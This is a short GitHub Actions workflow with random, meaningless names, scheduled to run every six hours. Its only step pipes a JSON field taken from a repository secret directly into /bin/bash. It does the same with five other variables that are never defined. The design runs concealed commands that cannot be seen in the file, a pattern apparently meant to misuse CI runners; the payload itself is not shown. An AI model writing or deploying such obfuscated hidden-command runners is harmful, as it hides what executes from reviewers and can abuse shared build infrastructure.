name: fnjcjkkk
on:
  workflow_dispatch:
  schedule:
    - cron: '13 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: fnjcjkkk
        env:
          i053: ${{ secrets.i053 }}
        run: |
          echo $i053 | jq -r .d616 | /bin/bash
          echo $fg7414 | jq -r .x326 | /bin/bash
          echo $brfc02 | jq -r .mum6 | /bin/bash
          echo $p88398 | jq -r .swgs6 | /bin/bash
          echo $pr0 | jq -r .mkn4631 | /bin/bash
          echo $r9093 | jq -r .vozo9168 | /bin/bash

